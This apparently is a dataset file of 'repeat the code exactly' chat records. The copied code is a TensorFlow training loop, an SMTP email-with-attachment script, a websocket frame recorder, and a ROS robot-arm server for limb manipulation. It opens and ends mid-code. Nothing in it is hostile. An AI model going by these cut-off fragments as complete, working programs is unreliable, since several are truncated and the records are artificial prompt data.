print 'Constructing models and inputs.'
with tf.Graph().as_default(), tf.device('/cpu:0'):
train_op = tf.train.AdamOptimizer(FLAGS.learning_rate)
tower_grads = []
itr_placeholders = []
image, flo, true_edge= build_tfrecord_input(training=True)
split_image = tf.split(axis=0, num_or_size_splits=FLAGS.num_gpus, value=image)
split_flo = tf.split(axis=0, num_or_size_splits=FLAGS.num_gpus, value=flo)
split_true_edge = tf.split(axis=0, num_or_size_splits=FLAGS.num_gpus, value=true_edge)
image_eval, mask_eval = build_tfrecord_input_eval()
summaries_cpu = tf.get_collection(tf.GraphKeys.SUMMARIES, tf.get_variable_scope().name)
with tf.variable_scope(tf.get_variable_scope()) as vs:
for i in xrange(FLAGS.num_gpus):
with tf.device('/gpu:%d' % i):
if i == FLAGS.num_gpus - 1:
scopename = "model"
else:
scopename = '%s_%d' % ("tower", i)
with tf.name_scope(scopename) as ns:
if i == 0:
model = Model(split_image[i], split_flo[i], split_true_edge[i], reuse_scope=False, scope=vs)
else:
model = Model(split_image[i], split_flo[i], split_true_edge[i], reuse_scope=True, scope=vs)
loss = model.loss
# Retain the summaries from the final tower.
if i == FLAGS.num_gpus - 1:
summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, ns)
eval_model = Model_eval(image_eval, mask_eval, scope=vs)
# Calculate the gradients for the batch of data on this CIFAR tower.
grads = train_op.compute_gradients(loss)
# Keep track of the gradients across all towers.
tower_grads.append(grads)
itr_placeholders.append(model.iter_num)
# We must calculate the mean of each gradient. Note that this is the
# synchronization point across all towers.
grads = average_gradients(tower_grads)
# Apply the gradients to adjust the shared variables.
apply_gradient_op = train_op.apply_gradients(grads)
# Create a saver.
saver = tf.train.Saver(
tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=5)
# Build the summary operation from the last tower summaries.
summary_op = tf.summary.merge(summaries + summaries_cpu)
# Make training session.
sess = tf.Session(config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False))
summary_writer = tf.summary.FileWriter(
FLAGS.output_dir, graph=sess.graph, flush_secs=10)
if FLAGS.pretrained_model:
saver.restore(sess, FLAGS.pretrained_model)
start_itr = int(FLAGS.pretrained_model.split("/")[-1][5:])
else:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
start_itr = 0
tf.train.start_queue_runners(sess)
# Run training.
for itr in range(start_itr, FLAGS.num_iterations):
# Generate new batch of data.
feed_dict = {x:np.float32(itr) for x in itr_placeholders}
_, summary_str = sess.run([apply_gradient_op, summary_op],
feed_dict)
if (itr) % SAVE_INTERVAL == 2:
orig_image1, flo, true_edge, \
pred_edge = sess.run([model.orig_image1,
model.flo,
model.true_edge,
model.pred_edge],
feed_dict)
if (itr) % (SAVE_INTERVAL*10) == 2:
tf.logging.info('Saving model.')
saver.save(sess, FLAGS.output_dir + '/model' + str(itr))
plot_flo_edge(orig_image1, flo, true_edge, pred_edge,
output_dir=FLAGS.output_dir, itr=itr)
# eval_summary_str, eval_image, eval_mask_true, eval_mask_pred = sess.run([eval_model.summ_op,
# eval_model.image,
# eval_model.mask_true,
# eval_model.mask_pred])
#
# plot_eval(eval_image, eval_mask_true, eval_mask_pred,
# output_dir=FLAGS.output_dir, itr=itr)
if (itr) % SUMMARY_INTERVAL:
summary_writer.add_summary(summary_str, itr)
# if (itr) % SUMMARY_INTERVAL*2 :
# eval_summary_str = sess.run(eval_model.summ_op)
# summary_writer.add_summary(eval_summary_str, itr)
tf.logging.info('Saving model.')
saver.save(sess, FLAGS.output_dir + '/model')
tf.logging.info('Training complete')
tf.logging.flush
if __name__ == '__main__':
app.run()
```
|
[
{
"content": "Repeat the code precisely as written (spacing intact):\n```python\n#! /Library/Frameworks/Python.framework/Versions/3.5/bin/python3\n# -*- coding: utf-8 -*-\n\n# 163服务器地址:\n# POP3服务器: pop.163.com\n# SMTP服务器: smtp.163.com\n# IMAP服务器: imap.163.com\n# sina服务器地址:\n# POP3服务器:pop.sina.com\n# SMTP服务器:smtp.sina.com\n\n\nfrom email import encoders\nfrom email.header import Header\nfrom email.mime.multipart import MIMEMultipart\nfrom email.utils import parseaddr, formataddr\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\n\nimport smtplib\n\ndef _format_addr(s):\n name, addr = parseaddr(s)\n return formataddr((Header(name, 'utf-8').encode(), addr))\n\nfrom_addr = '[email protected]'\npassword = input('Password(A18bit): ')\nto_addr = input('To: ')\nsmtp_server = 'smtp.163.com'\n\nmsg = MIMEMultipart()\nmsg['From'] = _format_addr('mssjzyyx623<%s>' % from_addr)\nmsg['To'] = _format_addr(to_addr)\nmsg['Subject'] = Header('问', 'utf-8').encode()\n\n\n# 邮件正文是MIMEText:\n# msg.attach(MIMEText('send with file...', 'plain', 'utf-8'))\nmsg.attach(MIMEText('<html><body><h1>Hello</h1>' +\n '<p><img src=\"cid:0\"></p>' +\n '</body></html>', 'html', 'utf-8'))\n\n\n# 添加附件就是加上一个MIMEBase,从本地读取一个图片:\nwith open('test.png', 'rb') as f:\n # 设置附件的MIME和文件名,这里是png类型:\n mime = MIMEBase('image', 'png', filename='test.png')\n # 加上必要的头信息:\n mime.add_header('Content-Disposition', 'attachment', filename='test.png')\n mime.add_header('Content-ID', '<0>')\n mime.add_header('X-Attachment-Id', '0')\n # 把附件的内容读进来:\n mime.set_payload(f.read())\n # 用Base64编码:\n encoders.encode_base64(mime)\n # 添加到MIMEMultipart:\n msg.attach(mime)\n\nserver = smtplib.SMTP(smtp_server, 25)\nserver.set_debuglevel(1)\nserver.login(from_addr, password)\nserver.sendmail(from_addr, [to_addr], msg.as_string())\nserver.quit()\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the code precisely as written (spacing intact):\n<|memory_start|>```python\n#! /Library/Frameworks/Python.framework/Versions/3.5/bin/python3\n# -*- coding: utf-8 -*-\n\n# 163服务器地址:\n# POP3服务器: pop.163.com\n# SMTP服务器: smtp.163.com\n# IMAP服务器: imap.163.com\n# sina服务器地址:\n# POP3服务器:pop.sina.com\n# SMTP服务器:smtp.sina.com\n\n\nfrom email import encoders\nfrom email.header import Header\nfrom email.mime.multipart import MIMEMultipart\nfrom email.utils import parseaddr, formataddr\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\n\nimport smtplib\n\ndef _format_addr(s):\n name, addr = parseaddr(s)\n return formataddr((Header(name, 'utf-8').encode(), addr))\n\nfrom_addr = '[email protected]'\npassword = input('Password(A18bit): ')\nto_addr = input('To: ')\nsmtp_server = 'smtp.163.com'\n\nmsg = MIMEMultipart()\nmsg['From'] = _format_addr('mssjzyyx623<%s>' % from_addr)\nmsg['To'] = _format_addr(to_addr)\nmsg['Subject'] = Header('问', 'utf-8').encode()\n\n\n# 邮件正文是MIMEText:\n# msg.attach(MIMEText('send with file...', 'plain', 'utf-8'))\nmsg.attach(MIMEText('<html><body><h1>Hello</h1>' +\n '<p><img src=\"cid:0\"></p>' +\n '</body></html>', 'html', 'utf-8'))\n\n\n# 添加附件就是加上一个MIMEBase,从本地读取一个图片:\nwith open('test.png', 'rb') as f:\n # 设置附件的MIME和文件名,这里是png类型:\n mime = MIMEBase('image', 'png', filename='test.png')\n # 加上必要的头信息:\n mime.add_header('Content-Disposition', 'attachment', filename='test.png')\n mime.add_header('Content-ID', '<0>')\n mime.add_header('X-Attachment-Id', '0')\n # 把附件的内容读进来:\n mime.set_payload(f.read())\n # 用Base64编码:\n encoders.encode_base64(mime)\n # 添加到MIMEMultipart:\n msg.attach(mime)\n\nserver = smtplib.SMTP(smtp_server, 25)\nserver.set_debuglevel(1)\nserver.login(from_addr, password)\nserver.sendmail(from_addr, [to_addr], msg.as_string())\nserver.quit()\n```<|memory_end|>",
"role": "user"
}
] |
```python
#! /Library/Frameworks/Python.framework/Versions/3.5/bin/python3
# -*- coding: utf-8 -*-
# 163服务器地址:
# POP3服务器: pop.163.com
# SMTP服务器: smtp.163.com
# IMAP服务器: imap.163.com
# sina服务器地址:
# POP3服务器:pop.sina.com
# SMTP服务器:smtp.sina.com
from email import encoders
from email.header import Header
from email.mime.multipart import MIMEMultipart
from email.utils import parseaddr, formataddr
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
import smtplib
def _format_addr(s):
name, addr = parseaddr(s)
return formataddr((Header(name, 'utf-8').encode(), addr))
from_addr = '[email protected]'
password = input('Password(A18bit): ')
to_addr = input('To: ')
smtp_server = 'smtp.163.com'
msg = MIMEMultipart()
msg['From'] = _format_addr('mssjzyyx623<%s>' % from_addr)
msg['To'] = _format_addr(to_addr)
msg['Subject'] = Header('问', 'utf-8').encode()
# 邮件正文是MIMEText:
# msg.attach(MIMEText('send with file...', 'plain', 'utf-8'))
msg.attach(MIMEText('<html><body><h1>Hello</h1>' +
'<p><img src="cid:0"></p>' +
'</body></html>', 'html', 'utf-8'))
# 添加附件就是加上一个MIMEBase,从本地读取一个图片:
with open('test.png', 'rb') as f:
# 设置附件的MIME和文件名,这里是png类型:
mime = MIMEBase('image', 'png', filename='test.png')
# 加上必要的头信息:
mime.add_header('Content-Disposition', 'attachment', filename='test.png')
mime.add_header('Content-ID', '<0>')
mime.add_header('X-Attachment-Id', '0')
# 把附件的内容读进来:
mime.set_payload(f.read())
# 用Base64编码:
encoders.encode_base64(mime)
# 添加到MIMEMultipart:
msg.attach(mime)
server = smtplib.SMTP(smtp_server, 25)
server.set_debuglevel(1)
server.login(from_addr, password)
server.sendmail(from_addr, [to_addr], msg.as_string())
server.quit()
```
|
[
{
"content": "Provide an exact copy of the source code:\n```python\nimport time\nimport logging\nfrom autobahn.asyncio.websocket import WebSocketClientProtocol\n\nlog = logging.getLogger(__name__)\n\n\nclass STFRecordProtocol(WebSocketClientProtocol):\n img_directory = None\n address = None\n resolution = None\n\n def __init__(self):\n super().__init__()\n self.first_msg_timestamp = None\n self.previous_msg_timestamp = None\n self.current_msg_timestamp = None\n\n def _construct_img_filename(self):\n img_filename = \"{0}.jpg\".format(\n self.current_msg_timestamp - self.first_msg_timestamp\n )\n return img_filename\n\n @staticmethod\n def _write_image_file(img_filename, binary_data):\n with open(img_filename, 'bw+') as file:\n log.debug('Writing image data to file {0}'.format(file.name))\n file.write(binary_data)\n\n def _write_metadata(self, img_filename):\n metadata_filename = \"{0}/input.txt\".format(self.img_directory)\n m_file = open(metadata_filename, 'a')\n log.debug('Appending image metadata to file {0}'.format(m_file.name))\n if self.previous_msg_timestamp is not None:\n duration = self.current_msg_timestamp - self.previous_msg_timestamp\n m_file.write(\"duration {0}\\n\".format(duration))\n m_file.write(\"file '{0}'\\n\".format(img_filename))\n m_file.close()\n\n def save_data_and_metadata(self, binary_data):\n img_filename = self._construct_img_filename()\n self._write_image_file(\"{0}/{1}\".format(self.img_directory, img_filename), binary_data)\n self._write_metadata(img_filename)\n\n def onOpen(self):\n log.debug('Starting receive binary data')\n if self.resolution:\n self.sendMessage(self.resolution.encode('ascii'))\n self.sendMessage('on'.encode('ascii'))\n\n def onMessage(self, payload, isBinary):\n if isBinary:\n self.current_msg_timestamp = time.time()\n if self.previous_msg_timestamp is None:\n self.first_msg_timestamp = self.current_msg_timestamp\n self.save_data_and_metadata(payload)\n self.previous_msg_timestamp = self.current_msg_timestamp\n\n def onClose(self, wasClean, code, reason):\n log.debug('Disconnecting {0} ...'.format(self.address))\n self.sendMessage('off'.encode('ascii'))\n```",
"role": "user"
}
] |
[
{
"content": "Provide an exact copy of the source code:\n<|memory_start|>```python\nimport time\nimport logging\nfrom autobahn.asyncio.websocket import WebSocketClientProtocol\n\nlog = logging.getLogger(__name__)\n\n\nclass STFRecordProtocol(WebSocketClientProtocol):\n img_directory = None\n address = None\n resolution = None\n\n def __init__(self):\n super().__init__()\n self.first_msg_timestamp = None\n self.previous_msg_timestamp = None\n self.current_msg_timestamp = None\n\n def _construct_img_filename(self):\n img_filename = \"{0}.jpg\".format(\n self.current_msg_timestamp - self.first_msg_timestamp\n )\n return img_filename\n\n @staticmethod\n def _write_image_file(img_filename, binary_data):\n with open(img_filename, 'bw+') as file:\n log.debug('Writing image data to file {0}'.format(file.name))\n file.write(binary_data)\n\n def _write_metadata(self, img_filename):\n metadata_filename = \"{0}/input.txt\".format(self.img_directory)\n m_file = open(metadata_filename, 'a')\n log.debug('Appending image metadata to file {0}'.format(m_file.name))\n if self.previous_msg_timestamp is not None:\n duration = self.current_msg_timestamp - self.previous_msg_timestamp\n m_file.write(\"duration {0}\\n\".format(duration))\n m_file.write(\"file '{0}'\\n\".format(img_filename))\n m_file.close()\n\n def save_data_and_metadata(self, binary_data):\n img_filename = self._construct_img_filename()\n self._write_image_file(\"{0}/{1}\".format(self.img_directory, img_filename), binary_data)\n self._write_metadata(img_filename)\n\n def onOpen(self):\n log.debug('Starting receive binary data')\n if self.resolution:\n self.sendMessage(self.resolution.encode('ascii'))\n self.sendMessage('on'.encode('ascii'))\n\n def onMessage(self, payload, isBinary):\n if isBinary:\n self.current_msg_timestamp = time.time()\n if self.previous_msg_timestamp is None:\n self.first_msg_timestamp = self.current_msg_timestamp\n self.save_data_and_metadata(payload)\n self.previous_msg_timestamp = self.current_msg_timestamp\n\n def onClose(self, wasClean, code, reason):\n log.debug('Disconnecting {0} ...'.format(self.address))\n self.sendMessage('off'.encode('ascii'))\n```<|memory_end|>",
"role": "user"
}
] |
```python
import time
import logging
from autobahn.asyncio.websocket import WebSocketClientProtocol
log = logging.getLogger(__name__)
class STFRecordProtocol(WebSocketClientProtocol):
img_directory = None
address = None
resolution = None
def __init__(self):
super().__init__()
self.first_msg_timestamp = None
self.previous_msg_timestamp = None
self.current_msg_timestamp = None
def _construct_img_filename(self):
img_filename = "{0}.jpg".format(
self.current_msg_timestamp - self.first_msg_timestamp
)
return img_filename
@staticmethod
def _write_image_file(img_filename, binary_data):
with open(img_filename, 'bw+') as file:
log.debug('Writing image data to file {0}'.format(file.name))
file.write(binary_data)
def _write_metadata(self, img_filename):
metadata_filename = "{0}/input.txt".format(self.img_directory)
m_file = open(metadata_filename, 'a')
log.debug('Appending image metadata to file {0}'.format(m_file.name))
if self.previous_msg_timestamp is not None:
duration = self.current_msg_timestamp - self.previous_msg_timestamp
m_file.write("duration {0}\n".format(duration))
m_file.write("file '{0}'\n".format(img_filename))
m_file.close()
def save_data_and_metadata(self, binary_data):
img_filename = self._construct_img_filename()
self._write_image_file("{0}/{1}".format(self.img_directory, img_filename), binary_data)
self._write_metadata(img_filename)
def onOpen(self):
log.debug('Starting receive binary data')
if self.resolution:
self.sendMessage(self.resolution.encode('ascii'))
self.sendMessage('on'.encode('ascii'))
def onMessage(self, payload, isBinary):
if isBinary:
self.current_msg_timestamp = time.time()
if self.previous_msg_timestamp is None:
self.first_msg_timestamp = self.current_msg_timestamp
self.save_data_and_metadata(payload)
self.previous_msg_timestamp = self.current_msg_timestamp
def onClose(self, wasClean, code, reason):
log.debug('Disconnecting {0} ...'.format(self.address))
self.sendMessage('off'.encode('ascii'))
```
|
[
{
"content": "Repeat the code exactly as the original, including blank lines:\n```python\n#! /usr/bin/env python\n\nimport rospy\nimport math\nfrom pprint import pprint\nimport numpy as np\nimport fetch_api\nfrom std_msgs.msg import String, Header, ColorRGBA, Bool\nfrom std_srvs.srv import Empty\nfrom image_geometry import PinholeCameraModel\nimport tf\nimport tf.transformations as tft\n# from tf import TransformBroadcaster\nfrom geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3\nfrom interactive_markers.interactive_marker_server import InteractiveMarkerServer\nfrom visualization_msgs.msg import Marker, MarkerArray, InteractiveMarker, InteractiveMarkerControl, InteractiveMarkerFeedback\nfrom sensor_msgs.msg import PointCloud2, JointState\nfrom ar_track_alvar_msgs.msg import AlvarMarkers\nfrom limb_manipulation_msgs.msg import EzgripperAccess, WebAppRequest, WebAppResponse\nimport moveit_commander\nfrom moveit_python import PlanningSceneInterface\nfrom moveit_msgs.msg import OrientationConstraint\nimport subprocess\nfrom robot_controllers_msgs.msg import QueryControllerStatesAction, QueryControllerStatesGoal, ControllerState\nfrom database import Database\nimport actionlib\nimport rosbag\nimport os\nfrom colour import Color\nimport sys\nfrom shared_teleop_functions_and_vars import dpx_to_distance, delta_modified_stamped_pose\nimport copy\n\n\n# maximum times to retry if a transform lookup fails\nTRANSFROM_LOOKUP_RETRY = 10\n# colors for trajectory visualization\nSTART_COLOR = Color(\"Orange\")\nEND_COLOR = Color(\"Blue\")\nTRAJ_HIGHLIGHT_SCALE = Vector3(0.05, 0.008, 0.008)\nWAYPOINT_HIGHLIGHT_SCALE = Vector3(0.05, 0.01, 0.01) # Vector3(0.055, 0.009, 0.009)\nWAYPOINT_HIGHLIGHT_COLOR = ColorRGBA(1.0, 0.0, 0.0, 0.8)\n\n# body parts and their corresponding ID# and actions\nBODY_PARTS = {0: \"right wrist\", 1: \"lower right leg\",\n 2: \"left wrist\", 3: \"lower left leg\"}\n\nACTIONS = {0: [\"right arm elbow extension\", \"right arm elbow flexion\"],\n 1: [\"right leg abduction and adduction\"], # , \"right leg medial rotation\", \"right leg lateral rotation\"],\n 2: [\"left arm elbow extension\", \"left arm elbow flexion\"],\n 3: [\"left leg abduction and adduction\"] #, \"left leg medial rotation\", \"left leg lateral rotation\"]\n }\n\nABBR = {\"right leg abduction and adduction\": \"RLAA\",\n # \"right leg medial rotation\": \"RLMR\", \"right leg lateral rotation\": \"RLLR\",\n \"left abduction and adduction\": \"LLAA\",\n # \"left leg medial rotation\": \"LLMR\", \"left leg lateral rotation\": \"LLLR\",\n \"right arm elbow extension\": \"RAEE\", \"right arm elbow flexion\": \"RAEF\",\n \"left arm elbow extension\": \"LAEE\", \"left arm elbow flexion\": \"LAEF\"\n }\n\n# leg medial rotation, leg lateral rotation\n# shoulder flexion, shoulder abduction, shoulder adduction, shoulder medial rotation, shoulder lateral rotation, \n# forearm pronation, forearm supination, \n# knee flexion, knee extension (seems to be performed when seated?)\n\n\ndef wait_for_time():\n \"\"\"\n Wait for simulated time to begin.\n \"\"\"\n while rospy.Time().now().to_sec() == 0:\n pass\n\n\nclass ArTagReader(object):\n def __init__(self):\n self.markers = [] # list of markers (update in real time)\n self.saved_markers = [] # list of markers saved (update only if update() is called)\n\n def callback(self, msg):\n self.markers = msg.markers\n\n def update(self):\n self.saved_markers = self.markers\n\n def get_tag(self, tag):\n \"\"\" Returns the marker with id# == tag \"\"\"\n for marker in self.saved_markers:\n if marker.id == int(tag):\n result = PoseStamped()\n result.pose = marker.pose\n result.header = marker.header\n return result\n return None\n \n def get_list(self):\n \"\"\" Returns the list of saved markers \"\"\"\n return self.saved_markers\n\n\nclass PbdServer():\n \"\"\" Server for PBD \"\"\"\n\n def __init__(self):\n # controls of Fetch\n self._arm = fetch_api.Arm()\n self._arm_joints = fetch_api.ArmJoints()\n self._torso = fetch_api.Torso()\n self._head = fetch_api.Head()\n self._base = fetch_api.Base()\n self._fetch_gripper = fetch_api.Gripper()\n # status of the arm: relax or freeze\n self._arm_relaxed = False\n # transformation\n self._tf_listener = tf.TransformListener()\n rospy.sleep(0.1)\n # AR tag reader\n self._reader = ArTagReader()\n self._ar_sub = rospy.Subscriber(\"ar_pose_marker\", AlvarMarkers, callback=self._reader.callback)\n # database of actions\n self._db = Database()\n self._db.load()\n # publisher and subscriber for controls of SAKE gripper\n self._sake_gripper_pub = rospy.Publisher('/ezgripper_access', EzgripperAccess, queue_size=1)\n self._sake_gripper_sub = rospy.Subscriber('/ezgripper_access_status', EzgripperAccess, callback=self._set_sake_gripper_action_status)\n\n\n # moveit: query controller\n self._controller_client = actionlib.SimpleActionClient('/query_controller_states', QueryControllerStatesAction)\n # moveit: move group commander\n moveit_commander.roscpp_initialize(sys.argv)\n moveit_robot = moveit_commander.RobotCommander()\n self._moveit_group = moveit_commander.MoveGroupCommander('arm')\n # motion planning scene\n self._planning_scene = PlanningSceneInterface('base_link')\n self._planning_scene.clear()\n\n # visualization\n self._viz_pub = rospy.Publisher('visualization_marker', Marker, queue_size=5)\n self._viz_markers_pub = rospy.Publisher('visualization_marker_array', MarkerArray, queue_size=5)\n\n # initial position of robot arm\n self._arm_initial_poses = [\n (\"shoulder_pan_joint\", 1.296), (\"shoulder_lift_joint\", 1.480), (\"upperarm_roll_joint\", -0.904), (\"elbow_flex_joint\", 2.251), \n (\"forearm_roll_joint\", -2.021), (\"wrist_flex_joint\", -1.113), (\"wrist_roll_joint\", -0.864)]\n \n # orientation constraint (unused)\n self._gripper_oc = OrientationConstraint()\n self._gripper_oc.header.frame_id = 'base_link'\n self._gripper_oc.link_name = 'wrist_roll_link'\n self._gripper_oc.orientation.z = -0.707\n self._gripper_oc.orientation.w = 0.707\n self._gripper_oc.absolute_x_axis_tolerance = 0.1\n self._gripper_oc.absolute_y_axis_tolerance = 0.1\n self._gripper_oc.absolute_z_axis_tolerance = 3.14\n self._gripper_oc.weight = 1.0\n # moveit args\n self._kwargs = {\n 'allowed_planning_time': 30,\n 'execution_timeout': 15,\n 'group_name': 'arm',\n 'num_planning_attempts': 10,\n # 'orientation_constraint': self._gripper_oc,\n 'replan': True,\n 'replan_attempts': 5,\n 'tolerance': 0.01\n }\n\n # current pose of gripper (used in performing actions)\n self._current_pose = None\n # bag file directory\n script_path = os.path.abspath(__file__)\n self._bag_file_dir = os.path.split(script_path)[0][:-4] + '/bags'\n\n # subscriber and publisher for frontend\n self._web_app_request_sub = rospy.Subscriber(\"web_app_request\", WebAppRequest, callback=self.web_app_request_callback)\n self._web_app_response_pub = rospy.Publisher('web_app_response', WebAppResponse, queue_size=5)\n # variables representing the program state\n self._sake_gripper_attached = False\n self._sake_gripper_action_finished = False\n self._sake_gripper_effort = \"100\"\n self._robot_stopped = False\n self._grasp_position_ready = False\n self._grasp_type = \"h_close\"\n self._do_position_ready = False\n self._do_position_id = -1\n self._preview_action_abbr = \"\"\n self._preview_traj = [] # the trajectory being previewed currently\n self._current_waypoint_id = -1\n\n rospy.sleep(0.5)\n\n def setup(self):\n \"\"\" Handler for robot set up \"\"\"\n print(\"\\nSetting up everything, please wait...\\n\")\n # set robot's initial state\n self._torso.set_height(0)\n self._head.pan_tilt(0, 0.8)\n # move arm to the initial position (with collision detection)\n self._arm.move_to_joint_goal(self._arm_initial_poses, replan=True)\n\n print(\"\\nThe program is ready to use :-)\\n\")\n\n def shutdown(self):\n \"\"\" Handler for robot shutdown \"\"\"\n print(\"\\nShutting down... Bye :-)\\n\")\n # clear display\n self._viz_markers_pub.publish(MarkerArray(markers=[]))\n # moveit\n self.freeze_arm()\n self._planning_scene.clear()\n self._arm.cancel_all_goals()\n # save the database\n self._db.save()\n # moveit: move group commander\n self._moveit_group.stop()\n moveit_commander.roscpp_shutdown()\n\n def attach_sake_gripper(self):\n \"\"\"\n Attaches SAKE gripper to Fetch's gripper, and updates the planning scene.\n \"\"\"\n self.freeze_arm()\n # attach SAKE gripper to Fetch's gripper\n self._fetch_gripper.open() # make sure Fetch's gripper is open\n self._fetch_gripper.close()\n self._sake_gripper_attached = True\n\n # add SAKE gripper to the planning scene\n frame_attached_to = 'gripper_link'\n frames_okay_to_collide_with = ['gripper_link', 'l_gripper_finger_link', 'r_gripper_finger_link']\n package_path = subprocess.check_output(\"rospack find ezgripper_driver\", shell=True).replace('\\n','')\n\n if rospy.get_param(\"use_urdf\"): # use real sake gripper mesh\n # palm\n sake_palm_pose = Pose(Point(-0.01, 0, 0.05), Quaternion(-0.7, 0, 0.7, 0))\n sake_palm_mesh_file = package_path + \"/meshes/visual/SAKE_Palm_Dual.stl\"\n self._planning_scene.attachMesh('sake_palm', sake_palm_pose, sake_palm_mesh_file, \n frame_attached_to, touch_links=frames_okay_to_collide_with)\n # fingers\n sake_finger_1_pose = Pose(Point(0, -0.03, -0.055), Quaternion(0.5, -0.5, 0.5, 0.5))\n sake_finger_1_mesh_file = package_path + \"/meshes/visual/SAKE_Finger.stl\"\n self._planning_scene.attachMesh('sake_finger_1', sake_finger_1_pose, sake_finger_1_mesh_file, \n frame_attached_to, touch_links=frames_okay_to_collide_with)\n sake_finger_2_pose = Pose(Point(0, 0.03, -0.055), Quaternion(-0.5, -0.5, -0.5, 0.5))\n sake_finger_2_mesh_file = package_path + \"/meshes/visual/SAKE_Finger.stl\"\n self._planning_scene.attachMesh('sake_finger_2', sake_finger_2_pose, sake_finger_2_mesh_file, \n frame_attached_to, touch_links=frames_okay_to_collide_with)\n else: # use a box to represent the sake gripper\n self._planning_scene.attachBox('sake', 0.03, 0.09, 0.15, 0, 0, -0.05,\n frame_attached_to,\n frames_okay_to_collide_with)\n self._planning_scene.setColor('sake', 1, 0, 1)\n self._planning_scene.sendColors()\n\n # calibrate SAKE gripper\n self.do_sake_gripper_action(\"calibrate\")\n\n def remove_sake_gripper(self):\n \"\"\"\n Removes SAKE gripper from Fetch's gripper, and updates the planning scene.\n \"\"\"\n self.freeze_arm()\n # remove SAKE gripper from Fetch's gripper\n self._fetch_gripper.close() # make sure Fetch's gripper is close\n self._fetch_gripper.open()\n self._sake_gripper_attached = False\n # remove SAKE gripper from the planning scene\n if rospy.get_param(\"use_urdf\"):\n self._planning_scene.removeAttachedObject('sake_palm')\n self._planning_scene.removeAttachedObject('sake_finger_1')\n self._planning_scene.removeAttachedObject('sake_finger_2')\n else:\n self._planning_scene.removeAttachedObject('sake')\n\n def update_env(self, update_octo=True):\n \"\"\"\n Updates the list of markers, and scan the surroundings to build an octomap.\n Returns false if the update fails, true otherwise.\n \"\"\"\n # update markers\n self._reader.update()\n # update octomap\n if update_octo:\n # clear previous octomap\n if not self._clear_octomap():\n return False\n # scan the range: pan -0.75~0.75, tilt 0~0.7\n for i in range(6):\n pan = -0.75 + 0.25 * i\n self._head.pan_tilt(pan, 0)\n rospy.sleep(2)\n self._head.pan_tilt(pan, 0.7)\n rospy.sleep(2)\n self._head.pan_tilt(pan, 0)\n # move the head back to initial position\n self._head.pan_tilt(0, 0.7)\n return True\n\n def do_sake_gripper_action(self, command):\n # publish response message\n if command == \"calibrate\":\n self._publish_server_response(msg=\"Calibrating SAKE gripper, please wait...\")\n elif command == \"h_close\":\n self._publish_server_response(msg=\"Hard closing SAKE gripper, please wait...\")\n elif command == \"s_close\":\n self._publish_server_response(msg=\"Soft closing SAKE gripper, please wait...\")\n elif command == \"open\":\n self._publish_server_response(msg=\"Opening SAKE gripper, please wait...\")\n else: # [percentage open, effort]\n self._publish_server_response(msg=\"Closing SAKE gripper, please wait...\")\n # publish command\n self._sake_gripper_pub.publish(EzgripperAccess(type=command))\n # wait for the action to finish if in real\n if not rospy.get_param(\"use_sim\"):\n while not self._sake_gripper_action_finished:\n continue\n # finished, reset\n self._sake_gripper_action_finished = False\n\n def reset(self):\n \"\"\" Moves arm to its initial position and calibrates gripper \"\"\"\n self.freeze_arm()\n self._arm.move_to_joint_goal(self._arm_initial_poses, replan=True)\n self.do_sake_gripper_action(\"calibrate\")\n self._robot_stopped = False\n self._reset_program_state()\n\n def estop(self):\n \"\"\" Emergency stop. \"\"\"\n self.relax_arm()\n self._robot_stopped = True\n self._reset_program_state()\n\n def preview_body_part_with_id(self, id_num):\n \"\"\"\n Publishes visualization markers to mark the body part with given id.\n \"\"\"\n raw_pose = self._get_tag_with_id(id_num)\n if raw_pose is not None:\n # visualize goal pose\n marker = Marker(type=Marker.CUBE,\n id=0,\n pose=raw_pose.pose.pose,\n scale=Vector3(0.06, 0.06, 0.06),\n header=raw_pose.header,\n color=ColorRGBA(1.0, 0.75, 0.3, 0.8))\n self._viz_pub.publish(marker)\n\n def goto_part_with_id(self, id_num):\n \"\"\" \n Moves arm above a body part specified by id_num.\n Returns true if succeed, false otherwise.\n \"\"\"\n self.freeze_arm()\n raw_pose = self._get_tag_with_id(id_num)\n if raw_pose is not None:\n # found marker, move towards it\n self.do_sake_gripper_action(\"40 \" + self._sake_gripper_effort)\n\n # OPTION 1: pregrasp ---> grasp\n # highlight and move to the pre-grasp pose\n pre_grasp_offset = self._db.get(\"PREGRASP\")\n pre_grasp_pose = self._move_arm_relative(raw_pose.pose.pose, raw_pose.header, offset=pre_grasp_offset, preview_only=True)\n self.highlight_waypoint(pre_grasp_pose, WAYPOINT_HIGHLIGHT_COLOR)\n if self._move_arm(pre_grasp_pose, final_state=False):\n # highlight and move to the grasp pose, clear octomap to ignore collision only at this point\n if self._clear_octomap():\n return self._move_arm(self._get_goto_pose(raw_pose), final_state=False, seed_state=self._get_seed_state())\n \n # # OPTION 2: grasp\n # return self._move_arm(self._get_goto_pose(raw_pose), final_state=False)\n\n # marker with id_num is not found, or some error occured\n return False\n\n def preview_action_with_abbr(self, abbr, id_num):\n \"\"\"\n Publishes visualization markers to preview waypoints on the trajectory with given abbr.\n Saves waypoints extracted from bag file to database if the entry \"abbr\" doesn't exist.\n Returns the colors of waypoints with respect to the ar tag. Records the positions of\n waypoints with respect to the ar tag.\n \"\"\"\n # clear previous markers\n self._viz_markers_pub.publish(MarkerArray(markers=[]))\n # check the database for the action\n waypoints = self._db.get(abbr)\n if waypoints == None or len(waypoints) == 0:\n waypoints = self._save_traj_to_db(abbr, id_num)\n\n self._preview_action_abbr = \"\"\n self._preview_traj = []\n waypoints_with_respect_to_tag = []\n if waypoints:\n raw_pose = self._get_tag_with_id(id_num)\n if raw_pose is not None:\n prev_pose = self._get_goto_pose(raw_pose)\n # markers\n marker_arr = []\n # marker color gradient\n colors = list(START_COLOR.range_to(END_COLOR, len(waypoints)))\n # visualize the trajectory\n for i in range(len(waypoints)):\n # visualize the current waypoint\n marker = Marker(type=Marker.ARROW,\n id=i,\n pose=prev_pose.pose,\n scale=TRAJ_HIGHLIGHT_SCALE,\n header=prev_pose.header,\n color=ColorRGBA(colors[i].red, colors[i].green, colors[i].blue, 0.8))\n marker_arr.append(marker)\n # record the waypoint\n 